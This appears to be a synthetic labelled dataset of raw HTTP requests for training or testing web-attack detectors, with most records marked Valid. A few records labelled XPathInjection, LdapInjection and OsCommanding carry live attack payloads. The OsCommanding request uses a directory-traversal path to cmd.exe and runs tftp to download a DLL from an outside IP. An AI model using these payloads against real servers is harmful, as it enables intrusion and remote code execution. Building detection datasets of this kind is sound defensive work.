If-Match: "Z0cy_sLHNeH6ZLUVm."
If-None-Match: *
If-Range: Wed, 21 Mar 07 17:07:29 GMT
Max-Forwards: 5243
MIME-Version: 3.4
Pragma: Aznlosrq='viwitaa'
Proxy-Authorization: NTLM b25lc2xsYUVLZXNzbGR0b21pZXJ5YTl3YWhvZWVzdHRiaXR5aHFyZ2Rpb2tiYXJ1
Authorization: bCrsta laTllgD=dhEbrtUh
Range: 28212-
Referer: http://www.wji2o6Im.com/nwN8/z1Zejdo/nedsu/anhO.tar
TE: trailers
Trailer: Range
User-Agent: la1all2 http://www.dwtrxH.gov
UA-CPU: MIPS
UA-Disp: 2709,267,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 0011x3310
Via: 6.1 1.243.110.61
Transfer-Encoding: identity
Upgrade: r5nsd/8.4, eecerh/9.5
Warning: 637 216.250.224.103 "tew7rd" "Sat, 20 Sep 08 06:41:50 GMT"
X-Forwarded-For: 173.109.21.18
X-Serial-Number: 55211271758
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 29407
Start - Id: 11837
class: Valid
GET /coRlO/STZuyAlGall32dA9/s3I.yncaYLk/UQDF/iPQ/iCo7bimnatw7Rel/ysCA4u.bin? HTTP/1.1
Host: 63.82.242.26
Connection: keep-alive
Accept: application/zip;q=0.4, application/rtf
Accept-Charset: big5;q=0.3, iso-2022-jp, windows-1253, big5;q=0.3, windows-1254;q=0.7
Accept-Encoding: identity, identity;q=0.3, gzip, deflate, compress;q=0.0
Accept-Language: *
Cache-Control: no-cache
Client-ip: 144.242.117.107
Cookie: uh=ts;AisbytxnrAn=71;qbh40etveet6=olxeeanctiaem
Cookie2: $Version="845"
Date: Fri, 13 May 05 21:43:30 GMT
ETag: "hP5TcJChMEOZ4s4KgW"
Expect: hheiA3
From: raeRsdn@ezgoodi.biz
If-Modified-Since: Mon, 05 Apr 04 21:22:52 GMT
If-Unmodified-Since: Wed, 23 Apr 08 09:05:11 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 6545
MIME-Version: 1.6
Pragma: iopc='seohmtec'
Proxy-Authorization: NTLM bmE4SnVlb2xuWWVmZXNPb2NwOWg3emVvbmdjY2Vhd2ZnYWFhb2xl
Authorization: NTLM d2s4bXB0dG5GYXdtbml0MnRpT25rZTJrdGxybDhNZ29p
Range: -9087,256-
Referer: /nmxIq/jmde/krhvlgge/shYj/qTfs.mdb
TE: deflate;q=0.1
Trailer: From
User-Agent: su3Z7ofp6 http://www.tpsem.uk
UA-CPU: x86
UA-Disp: 032,592,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 045x0190
Via: 1.2 www.ed7r.htm, 5.5 www.c4dr.png
Transfer-Encoding: compress
Upgrade: qeona/2.2, e3aae/0.6
Warning: 779 www.runsnon.css "al5s6npNr3oe0Heo" "Sun, 08 Mar 09 02:18:33 CET"
X-Forwarded-For: 154.0.65.175
X-Serial-Number: 63208652767395
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11837
Start - Id: 49748
class: XPathInjection
GET /Fenth/hanEpasoBeanee7tckl/ss6jHK7Egb./t-qm/ob/tOchildjUoU9S7l2/rEI52CHS8/zRr68iDw3TCfR/aa4Ov_3F3AUuWL__9.jpeg?ayRainFpid=gtoKeeCosomrl&WM1cat-BPU=qSp8e2t9&lticakqodet=gzqzE&oiwge=erukehm%3Cdr2peo&hamv72i=olo5yoM%27++or+++++count%28path%2Fchild%3A%3Anode%28%29%5Bposition%28++%29%3D%28%28+++i++%2B++++j+++%2B+k%2B++l++%2B+++1%29%5D+++++%7C+path%2Fchild%3A%3A*%28%29%5Bposition%28%29%3D%28k%2B1%29%5D%29%3D1++++or+%275r%27%3D+%27++++nrd%27++or&hieghSo8i=30937078 HTTP/1.0
Host: 159.189.90.95
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, x-mac-ce, iso-2022-kr;q=0.2
Accept-Encoding: 
Accept-Language: obBaIadS-ceaBhilF, l9tcusyi-dcneu;q=0.8, ov7uaona-luott;q=0.3, tqa-C;q=0.4, hried-monhd
Cache-Control: only-if-cached
Client-ip: 24.134.122.55
Cookie: bZi79qpBS=  rS2;S6ic=dS4i;sjutdwtnn8Eu= n;da=43574573;sev8lls=76
Cookie2: $Version="0"
Date: Mon, 27 Feb 06 12:11:38 CET
ETag: W/"C6vM2QmYRX16nGaa"
Expect: 100-continue
From: cnbutmc@typvDt.cz
If-Modified-Since: Mon, 09 Jun 08 06:49:30 GMT
If-Unmodified-Since: Wed, 13 Aug 08 21:00:14 CET
If-Match: *
If-None-Match: *
If-Range: "MeCafWHvG_bmrQit"
Max-Forwards: 47
MIME-Version: 6.2
Pragma: smoomr='tSisist'
Proxy-Authorization: Basic emVnbmU6b3RjUmRiYQ==
Authorization: Digest opaque="reseriT"
Range: -1702
Referer: http://jlescbo.org/dT5d3n/3iGdOt/pdnhhlT/i2wdvssi/ntzs1tke.zip
TE: trailers,gzip;q=0.9
Trailer: Max-Forwards
User-Agent: Mozilla/5.1 (Windows; U; Win 9x 5.2; ir-th; rv:7.6.6) Gecko/44004480
UA-CPU: x86
UA-Disp: 317,738,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 413x0589
Via: HTTP/3.7 175.103.86.250
Transfer-Encoding: cdiher; oy9opo=dsyp
Upgrade: pksat/0.9, it6/4.7, Atv/0.3, zos/6.7, aoE/5.6
Warning: 835 www.aifJnm.js "9hedstplseeoacoe" "Thu, 13 May 04 16:51:39 CET"
X-Forwarded-For: 246.149.155.68
X-Serial-Number: 9273829516846529
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49748
Start - Id: 37787
class: LdapInjection
GET /tfwxihmyobna5aed/5OhrSniwnhd/Q19nS.rcp0DExterm5st/qm/d9hnIhphD1s/ra3tle5cdmopteesToe/Ynhsoblt/x@z@FZg_iZPn09b/e9m5jPE/ecJ.5T1l7w.N6Q4xZ.aspx?qtsiv=%29++%28++%7C+++%28+++cn%3D*o%27brien*%29%28mail+%3D*o+%27brien*+%29++++&mseIa4a=tat6Saeiie74&si=%5Dtfsro8t%3Bboot.ini&meNhoiyylmep=W%2Boar&Ensit5NUTa=os%3F5tlm&rbianb=e53scn&cmn4pP8Ts=iIIa1h8Lt3arec HTTP/1.1
Host: www.igauaf.uk
Connection: acrre
Accept: */*
Accept-Charset: windows-1258;q=0.0
Accept-Encoding: 
Accept-Language: lELt-neotm, hc3a3eo-fsrxm5hf;q=0.2, s0ywerl-chneo4d;q=0.7
Cache-Control: min-fresh=71
Client-ip: 3.185.76.253
Cookie: aEii=or\[tar t;ooHthnno6a=t_fsrfZSKs;wtretzt=8gntbldoeasb3;Eq01yDV=9
Cookie2: $Version="03"
Date: Tue, 06 Apr 04 18:13:36 GMT
ETag: W/"h6vB3KF92zhMxzvOX9n"
Expect: 100-continue
From: 0toi@nMoY9ioe.ch
If-Modified-Since: Thu, 28 Oct 04 01:28:49 UTC
If-Unmodified-Since: Mon, 28 Jul 08 08:54:41 GMT
If-Match: "ZV7UNwIvw3kjBAl."
If-None-Match: "xP.2rvy@Kyq-1nFiQacF"
If-Range: Thu, 22 Jun 06 08:08:38 UTC
Max-Forwards: 348
MIME-Version: 1.4
Pragma: iteVh='f5'
Proxy-Authorization: NTLM dlN6ZDlvTjNUaGd0ZWVpdGthc010YXR6YzVpakFFaVB0SQ==
Authorization: Basic UmVhZXB5bDpzZG90aQ==
Range: 47-,41517-
Referer: /kf4nh9/mrarAe/7hMvitdl/Msnizn.asp
TE: gzip,trailers
Trailer: Expect
User-Agent: Mozilla/2.9 (Machintosh; U; Mac OS X 9.4; se-3t; rv:5.6.8) Gecko/64005669
UA-CPU: x86
UA-Disp: 3289,383,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 807x162
Via: 3.5 190.223.81.43:53
Transfer-Encoding: deflate
Upgrade: 1wi/0.9, ue5/8.1, uoi/7.4
Warning: 129 www.uqhu9nc.htm "laft4oha" 
X-Forwarded-For: 229.226.152.130
X-Serial-Number: 0381591746319527137
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37787
Start - Id: 17904
class: Valid
GET /1tssq6biedwp5pts/ofVF_a0-rO/o4o8Ds6JEDGCtNH/2qhTuiprg4tMpei/eUSnopajne/Nrbf/8ueonr1aGycstrtsNthe/gB.asp?PfEshutdown5ALSf_=34131&jifasa1kowksre=hYaE1j8sc&7BreplaceyWj=t5oatsnyrurW9&knb=englc0tr%3DtRasnph-+&irijrsn1y=t8iall2nsaeooal++&Antami=lha%27rzn3&6MqsyeectHh7=yCo3BL.n6&3dtVt=ysBe%24un%3EtslN&sgNshee=2bTlt7anhp HTTP/1.0
Host: 154.23.79.250
Connection: close
Accept: video/*, video/mpeg;q=0.7
Accept-Charset: x-mac-roman, hz-gb-2312, iso-8859-8-i;q=0.4, us-ascii;q=0.4
Accept-Encoding: 
Accept-Language: nltac-5hd;q=0.0, oanslmdn-Tneee, e9i3-to1gia, ahervcs-nxspne, gEhms-n
Cache-Control: no-cache
Client-ip: 130.124.72.217
Cookie: pnta=/de;zTsnIinfee=5399006;UTK4c.I_=872203878;telozrdLTwfk=79;ain=eoefae
Cookie2: $Version="54"
Date: Tue, 05 May 09 12:28:07 GMT
ETag: "McZSi2nb_OmgoB8"
Expect: shernS8
From: rdny@hctpuostk.cz
If-Modified-Since: Tue, 08 Aug 06 16:21:37 UTC
If-Unmodified-Since: Fri, 13 Aug 04 16:49:24 UTC
If-Match: *
If-None-Match: "kul3luiFlSx8q3s"
If-Range: *
Max-Forwards: 23
MIME-Version: 7.2
Pragma: no-cache
Proxy-Authorization: Basic dGV0ZUk6ZGxpdg==
Authorization: aahT fAd7=onn2sth
Range: -299
Referer: /avEeitiv/llcEt/uplr/ttSwft7a.mpg
TE: deflate
Trailer: Max-Forwards
User-Agent: Mozilla/4.6 (Windows; U; Win 9x 8.0; mo-Cb; rv:4.6.0) Gecko/14847893
UA-CPU: Sparc
UA-Disp: 427,601,8
UA-OS: Win9x
UA-Color: color32
UA-Pixels: 523x1389
Via: 0.5 www.jdqvwl.shtml, sinsa/0.7 77.115.166.12, 7.5 www.55rutel.jpeg
Transfer-Encoding: identity
Upgrade: tigP/7.0
Warning: 737 27.95.14.86 "Soaoayayt4nrwenZO" 
X-Forwarded-For: 188.200.228.132
X-Serial-Number: 9848496261242496649
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17904
Start - Id: 16339
class: Valid
GET /y5guUoqHXU/nMmWlMTftI/aoht5yhqbbiaoDe/neB6zfiaKhlElr/ermeay5aoe/.GQMdetcspsT/anUMv@eWk/bzMr4xSsnqrbmNp2./rkoRSGN5i1-/a8IO.html?ntoHy1omqa=hYYqXQG-jQa2&veh4inmebl=81&orscraL=e&er2i3dr=1731761 HTTP/1.1
Host: www.urly.cz:6
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.3
Accept-Language: *;q=0.0
Cache-Control: max-age=6
Client-ip: 33.226.87.182
Cookie: ninernsN=ittph;9lduaEa=loHalei)ei0
Cookie2: $Version="88"
Date: Sun, 03 Sep 06 10:58:19 UTC
ETag: W/"i_852kNFC8hsY6K2lVEr"
Expect: 100-continue
From: EMlse@n8Gtdetp8r.ch
If-Modified-Since: Sun, 18 Jul 04 13:45:47 UTC
If-Unmodified-Since: Wed, 07 Jul 04 09:04:42 CET
If-Match: *
If-None-Match: "rkyRuWRnyGrOu_igHqrH"
If-Range: *
Max-Forwards: 0
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: NTLM dGJlcjJlb1l3ZW9hc25zZHJlMHQ5ZW5pZkRuTGRsaWU=
Authorization: Digest qop=auth-int
Range: -652120,9-,091-
Referer: /l9ure7/nttr/lzrec.zip
TE: deflate;q=0.5
Trailer: Upgrade
User-Agent: Mozilla/2.3 (X11; U; Unix 6.2; lv-i3; rv:7.4.4) Gecko/92782447
UA-CPU: Sparc
UA-Disp: 101,468,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 7557x889
Via: sfSuxm/7.1 www.nesnc.tiff, rsnwR5/1.0 216.60.213.85, 6.2 www.edIqln.shtml
Transfer-Encoding: deflate
Upgrade: ltsn/5.8, h5e/2.9, nabeo/7.5, tnn/0.6, pr74/9.1
Warning: 799 www.moaimt.jpg:7272 "O1enqniO8" "Mon, 09 May 05 14:13:25 CET"
X-Forwarded-For: 33.237.44.240
X-Serial-Number: 6166781
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16339
Start - Id: 28689
class: Valid
GET /af/8qEAeon7UdI0/fv0aJdGfqEg8e.cfm?ahX8=bn0%40nz&af8rws=nnOrn5jna3Rel5to&ahar0F5tle=oibodk HTTP/1.1
Host: 246.219.7.9:80
Connection: RbpeTo
Accept: audio/*
Accept-Charset: euc-kr
Accept-Encoding: deflate
Accept-Language: alfns-ay, muth-dg, nnn-e6, ii-eucEti;q=0.2, 2mmlhe-Enla4ule
Cache-Control: max-age=672
Client-ip: 180.225.148.197
Cookie: ma=Gi;hifs11baesaDs=(nd;at3egamdsee=tGUrEjyVSsQy;pmbvecgoS=r;moY=exed9nxsn3amr
Cookie2: $Version="59"
Date: Sun, 17 Feb 08 06:31:01 CET
ETag: W/"-fzIDzKEZRMd5E."
Expect: 100-continue
From: 9rL2esue@fang.it
If-Modified-Since: Sun, 11 Jul 04 15:36:14 GMT
If-Unmodified-Since: Thu, 13 Sep 07 16:27:30 GMT
If-Match: "_ywr.9KXRf8Z3@ffawu"
If-None-Match: "16o78Py6@CscKlBqS@"
If-Range: *
Max-Forwards: 5
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest response="402fAbe20bCA7521de8FBa324bDF8Af8"
Authorization: Digest nc=0eA2bbE9
Range: -440021
Referer: /mUaeA/syocerb2/yWene.exe
TE: trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: sd9za/1.6.4.2
UA-CPU: Sparc
UA-Disp: 638,830,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 621x541
Via: 6.2 111.77.174.223, 1.7 121.183.234.99, HTTP/5.4 www.iamrl.shtml
Transfer-Encoding: compress
Upgrade: mptnoI/0.5, iTp4m/8.4, 0hyWd/3.5
Warning: 301 www.imbgmn.html "3hfoDiswcieii1rergd1" "Thu, 12 May 05 01:08:10 UTC"
X-Forwarded-For: 70.75.45.186
X-Serial-Number: 244229732731
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28689
Start - Id: 15289
class: Valid
GET /7TZtelnetmDfromLYdropv/ktiteirfnmt/eiwwi7tge/hzo72J/heuoeoT/ebstothvaiqhtiip/XoUGhbhttpsWtb3vY/sWtOhE/jOc31Ski0vwNrawzv2R/7msh6d.css?aaEu7n=048&Intnru2hkI3A0=34705 HTTP/1.0
Host: 44.248.88.118:0
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: oadnu=O
Client-ip: 4.96.29.247
Cookie: Sneuvit7o4ahln=55857205;rotuehaamtmrpmv=a0a ;yg6luma=dHHa;ei=rh;ye=sktuXCeD;oE0bOp6vedwsr=nnrehaest
Cookie2: $Version="772"
Date: Sat, 28 Oct 06 01:26:05 UTC
ETag: "eyEDedkQLRzP76QO1Y"
Expect: 100-continue
From: gAat@srhiszsne3.gov
If-Modified-Since: Fri, 29 Jan 10 20:38:51 GMT
If-Unmodified-Since: Thu, 19 Jul 07 19:57:20 GMT
If-Match: "cHUotYQeAyVH9M5"
If-None-Match: "ApCSzTMS4ezJcgz"
If-Range: "gsfQBbu_ow0cJPHcb-e"
Max-Forwards: 3
MIME-Version: 5.6
Pragma: no-cache
Proxy-Authorization: Digest opaque="rtaas7"
Authorization: vhXegs iDanz4=ancu6qs
Range: -425
Referer: http://www.iEroesR.uk/inmp/ihessiat/eriherh/esio5slr/raoxhs1h.css
TE: trailers,deflate;q=0.8,chunked
Trailer: Upgrade
User-Agent: Mozilla/3.9 (Machintosh; U; PPC Mac OS X 2.9; eY-tW; rv:1.4.8) Gecko/56394707
UA-CPU: 68000
UA-Disp: 8576,0816,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 9424x098
Via: FTP/5.2 72.161.227.50, QfqIj/8.3 www.otetdGcc.png, ftdll/6.1 165.158.33.110:3
Transfer-Encoding: gzip
Upgrade: hfypo3/8.4, oeoo/3.1, IskcE/6.7, mdredh/7.9, fmaid/9.9
Warning: 138 www.AisaedTu.png "eyiwdeehii" "Thu, 16 Feb 06 14:40:29 UTC"
X-Forwarded-For: 181.70.199.85
X-Serial-Number: 193733514519780157
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 15289
Start - Id: 43959
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20c:\httpodbc.dll HTTP/1.1
Host: 115.157.97.171
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.8
Accept-Encoding: 
Accept-Language: TAnn-4;q=0.1, L-omnztdid, 5i56xdd-nsm;q=0.5, 2l-E0tsnn5e;q=0.7
Cache-Control: no-cache
Client-ip: 167.244.39.243
Cookie: oisllntse=0;keryv6t=05091
Cookie2: $Version="588"
Date: Sun, 02 Nov 08 01:15:14 GMT
ETag: W/"g.zs56ap96bucj4wI"
Expect: Ktdna
From: axenii@lMdner.de
If-Modified-Since: Wed, 06 Jun 07 12:18:26 UTC
If-Unmodified-Since: Tue, 26 Sep 06 03:10:26 UTC
If-Match: *
If-None-Match: "4Ib8nR.KnYokT6Z@pfKr"
If-Range: Tue, 07 Oct 08 03:31:37 GMT
Max-Forwards: 7324
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: NTLM bmxnaGZjaGlvaHRyYm50MDZicmlncFptY3FUc25pbXp0c3J2YmhodHk=
Authorization: Digest realm
Range: 97793-3,500796-0
Referer: http://mlfs.de/mqzoRe/arqht/i6p5l/i1ezaeei/lnMoygat.rar
TE: trailers,trailers
Trailer: Via
User-Agent: qdom1odf (eHKowtX1H; og88WfP; ndeVQ59nj-; rET.hd)
UA-CPU: 68000
UA-Disp: 7638,7203,8
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 4200x926
Via: FTP/9.5 139.75.116.233:62858, 0.9 www.s1nbh4.tiff, HTTP/8.5 www.hiitani.jpg
Transfer-Encoding: gzip
Upgrade: pAn/5.4, eynSnm/6.6
Warning: 185 www.ayfae.tiff:7 "h2dyo3oifn2sa9H7" 
X-Forwarded-For: 157.151.213.231
X-Serial-Number: 221610848523557
----: ----------
~~~~~: ~~~~~~~~~~

null

End - Id: 43959
Start - Id: 18948
class: Valid
GET /nrlt3nxleZiefo9ocs.htm?amtaphnuecufeon=215&KNq.6Leval1=dDu+&hhjSotnd=n7mfzf&illoveOt2=tz3Y&JoBVFdHbW=1753 HTTP/1.0
Host: 105.0.126.34:060
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: iso-2022-jp, iso-8859-5
Accept-Encoding: *
Accept-Language: oaxc-npen;q=0.1, rnysenh-fsh6in93;q=0.3, ltlce-rt;q=0.6, ynt-nhgqa;q=0.0, yusiarli-htyTE
Cache-Control: only-if-cached
Client-ip: 248.148.61.44
Cookie: ye=3198;uif1bsa6aoeaunh=vnDz1AG2Z8
Cookie2: $Version="7"
Date: Thu, 12 Feb 09 01:50:12 CET
ETag: W/"@uw-xpOXGwmC-AX"
Expect: 100-continue
From: yhhrcnd@rmltnrr.ch
If-Modified-Since: Tue, 08 Apr 08 09:01:45 CET
If-Unmodified-Since: Mon, 08 Dec 08 08:31:29 GMT
If-Match: *
If-None-Match: *
If-Range: Thu, 20 Oct 05 01:13:26 CET
Max-Forwards: 4
MIME-Version: 9.9
Pragma: loaasena='r'
Proxy-Authorization: nr6w aeess=srRl
Authorization: NTLM bnRudG9hc25lS2V0ZW9saHR0clJ0dWZ6YnFtaXRzaEY=
Range: -617,3541-,95-
Referer: /x4fll/klpxatxe/iiosl/ntib.pl
TE: trailers,chunked,trailers
Trailer: Cache-Control
User-Agent: hatPejqsefufth8xrt
UA-CPU: StrongARM
UA-Disp: 2836,0618,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 2163x0680
Via: 9.9 152.45.137.146
Transfer-Encoding: dosr; l2t9ex=tttkttkb
Upgrade: galn/0.4, ss2C/2.0, o7ocRs/3.2
Warning: 692 44.133.112.13:93 "qeioOOte8asoelLtth" "Fri, 29 May 09 16:30:06 CET"
X-Forwarded-For: 31.248.238.253
X-Serial-Number: 27260320301
----: ----------------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 18948
Start - Id: 49000
class: XPathInjection
GET /vasiEe/5I/dr0cp@OkpuyVOgzhOc/wt.tiff?bn3W8ZOselect6nc=17811074&tstuqfxrT4=nyskErWyobay&qioc6nanaCtyt=nyreCmIN6TI&g7vcl4t5mo3mj=iitcE&sarche=651&ahY1Runkdztewbi=7&cd=50026&NhdaLjae=es&rrncyineseatEpu=evalTurn6etcereplacen&eztlI0=atM%27++or+++1%3C+++++aotst%2Fn%2Fdla%2Fchild%3A%3Atext%28%29%5Bposition%28%29%3D9%5D+++or++++%27fae%27+++%3D++%27&NysBK68GX=tE&oseneuhxrtiD=9 HTTP/1.0
Host: www.iBsRDNloc.org
Connection: Magnt
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: deflate;q=0.0, identity
Accept-Language: sinet-E, oEtfs-p
Cache-Control: max-stale=97783
Client-ip: 227.105.165.38
Cookie: s1elcsr=4
Cookie2: $Version="6"
Date: Wed, 10 May 06 22:33:20 GMT
ETag: W/"_rZhm0NzLc2Mi18y-yg"
Expect: 100-continue
From: yriAeeon@iwtteeent.st
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Thu, 11 Oct 07 03:34:37 UTC
If-Match: *
If-None-Match: "D2Wh7_IIA9k5CkVBDhw5"
If-Range: "Nkl_1cQDSzNpyd8aNW"
Max-Forwards: 52
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic aW5vZWk6aXR5ZWxpdA==
Range: -520,420265-,87-062067
Referer: http://to7rn.uk/ut2mii/ljfdlto2/n5olvEe/snnebut.swf
TE: deflate;q=0.9
Trailer: Range
User-Agent: Mozilla/2.2 (Machintosh; U; PPC 4.7; 96-co; rv:3.1.5) Gecko/27111916
UA-CPU: 68000
UA-Disp: 5404,6242,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 146x384
Via: 2.4 197.55.30.48
Transfer-Encoding: gzip
Upgrade: aciIr/5.8, i4yc/6.1, 4tur/3.8
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49000
Start - Id: 16865
class: Valid
GET /nHift1I/eX@Y30tq/psOlo3hoDlDaz-/idr6hnndkb8Echr/gcP/xtermYR@J5eenkxi/nIZFIglH-7.wF/sxv.X-T7-K7P.xn6s/5k/tolhsifh0efek/t7MfiRzeH2h/ianimVwainnl.htm?2leohdreurj=406217&otioclreaTD6f=nz0aaSLKUd0%3D4&NNgCzS8FQ4SR=%7CallT&ea3etiph9tn=m3h&inpoanotnas=3&asdssLet4mSrr=tbniSmHeX__&f0rzInfctw=l&9m75znJ0eagir=5142&eedA3gurbny=%7CQ&oftn4s4slrfi7dL=I&mti4h=8367&7Ibe8e=%246oyatausupst%5B+&eoMh1e7n=oR%3ErNui%25+ HTTP/1.0
Host: 148.154.218.26
Connection: close
Accept: application/*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: no-store
Client-ip: 127.221.48.135
Cookie: y3l2noqewclwyno=erl5efe 2;dS=h;eijL6xy=eLeiotatm;thypfpara9ecirv=76
Cookie2: $Version="9"
Date: Sat, 24 Nov 07 09:16:39 UTC
ETag: W/"eBIFZ7cqCEyqPiQYq"
Expect: eadt7tHr
From: oieuzw@OnwCatDke.cz
If-Modified-Since: Sat, 21 Aug 04 17:52:25 GMT
If-Unmodified-Since: Thu, 22 Apr 10 14:59:32 GMT
If-Match: "J9wr5BYVm3Bp2KUJMX3"
If-None-Match: *
If-Range: "IhseubsoH8D2PRG"
Max-Forwards: 901
MIME-Version: 8.8
Pragma: pH='rrsaDn'
Proxy-Authorization: Basic aG5laXc6ZGxxblU=
Authorization: Digest username="9If4ua7"
Range: -70,5-305
Referer: /lbeteh0.js
TE: gzip,trailers,trailers
Trailer: Trailer
User-Agent: eh6u/2.2
UA-CPU: Sparc
UA-Disp: 872,848,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x8989
Via: 7.0 84.1.0.194, 3ie2/4.2 132.60.41.157, FTP/8.3 www.rohssrc.shtml
Transfer-Encoding: identity
Upgrade: IDaaec/9.5, tkiame/5.5
Warning: 175 www.72ntce.js "kngnaee" 
X-Forwarded-For: 5.165.70.120
X-Serial-Number: 926077
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16865
Start - Id: 16120
class: Valid
GET /AsaaAdXeopesf0o/rx1O2Kl.Wu/rPmlje/genaOnh46tnlNeDxola/9sYJSXedLvO/4aesegtugea/QYB.Alkwhl4.cgi?lstbEaclmdcdf=30587&otnLh0=%27t1tj64%26nBarIt9&sfioeCdebs=erpeiitvbscriptt%5Ces&DS9FO=887684&cealEeituponl=85644366&qdr=kANkMi4K2BuJ&8Y.--_.Rj8yf=psP&1unAlcjdlfosp5=jORL76Df HTTP/1.0
Host: www.boiEe9sg.it:80
Connection: ojlfi8e
Accept: */*;q=0.3
Accept-Charset: *
Accept-Encoding: *
Accept-Language: k-5eU;q=0.6, natide-dto
Cache-Control: min-fresh=7
Client-ip: 204.40.193.158
Cookie: cpsdh5Ngtnc=8gst;bJ5C5=86911;xmnU5s8ath=73htna f
Cookie2: $Version="7"
Date: Sun, 02 May 04 12:05:48 GMT
ETag: W/"@@Ao_oS1B2xROh_kXJ"
Expect: 100-continue
From: c2a1pa@8itiJl.de
If-Modified-Since: Sat, 08 May 04 20:02:29 CET
If-Unmodified-Since: Thu, 13 Oct 05 20:17:23 CET
If-Match: "EMjGf1rwmXZCPopS"
If-None-Match: "km201qEctfLtT8b"
If-Range: *
Max-Forwards: 26
MIME-Version: 2.7
Pragma: fcn1a4p='a'
Proxy-Authorization: NTLM YTRlaTBsc3JzbXNudGVicmxhTGhyZWl3aXVob05sNWZyc3Bkcg==
Authorization: NTLM bm55aG11bzZzdGxuT3c4ODJzcGFlMnZPc2FzdDR0NHQ5N3JzdHRw
Range: 215-,20-
Referer: /ndnE7/dapt2a/st3ta/hthneopl/oe6rc.swf
TE: deflate,gzip
Trailer: Connection
User-Agent: Mozilla/0.8 (compatible; xoo4l1; Win 9x; avKesu)
UA-CPU: MIPS
UA-Disp: 235,1889,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 8164x933
Via: 3u7eai/7.4 www.atbt.jpeg
Transfer-Encoding: compress
Upgrade: ro1tlo/3.6, tuh/6.6
Warning: 964 221.114.71.110:2492 "9tmf4asphah" 
X-Forwarded-For: 45.149.45.168
X-Serial-Number: 6495346475
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16120
Start - Id: 22665
class: Valid
GET /i59seothn5t8Nectan/7nemrhHl3aleb8ge5.html? HTTP/1.0
Host: 244.113.69.212
Connection: close
Accept: */*;q=0.1
Accept-Charset: *
Accept-Encoding: identity, gzip;q=0.0, compress, compress
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 128.179.110.99
Cookie: eionu6n=7roel];rinoiTwqDq=brm;fbYU1Cboot.inix6gJ6=plinknpr
Cookie2: $Version="67"
Date: Sat, 11 Jun 05 24:31:33 UTC
ETag: "jnQdKGMrAZBmOLKG0"
Expect: ee26eyl
From: aeteiv@dttlm6ae.org
If-Modified-Since: Fri, 10 Mar 06 24:51:56 CET
If-Unmodified-Since: Wed, 28 Mar 07 16:42:27 UTC
If-Match: *
If-None-Match: "RZdFac.xYafY6cy"
If-Range: Sat, 16 Aug 08 07:09:58 CET
Max-Forwards: 211
MIME-Version: 9.7
Pragma: pd=nntpe
Proxy-Authorization: go0M6u fnxd=4kel
Authorization: Digest nc=cE58Cdbe
Range: -708576,-3
Referer: /59fse/owftiie.mspx
TE: trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/8.4 (compatible; MSIE 8.9; Win 9x; deg48d)
UA-CPU: MIPS
UA-Disp: 1998,0662,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 0084x738
Via: di5/9.9 www.Nebde.htm:555
Transfer-Encoding: identity
Upgrade: Ttn/9.0, tP0eRt/0.6, u4tias/8.0, alon/7.6, m9oa5l/9.7
Warning: 139 www.hnsi.shtml "stteZiesi" 
X-Forwarded-For: 23.196.24.89
X-Serial-Number: 12701556330524195
----: ----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 22665
Start - Id: 3270
class: Valid
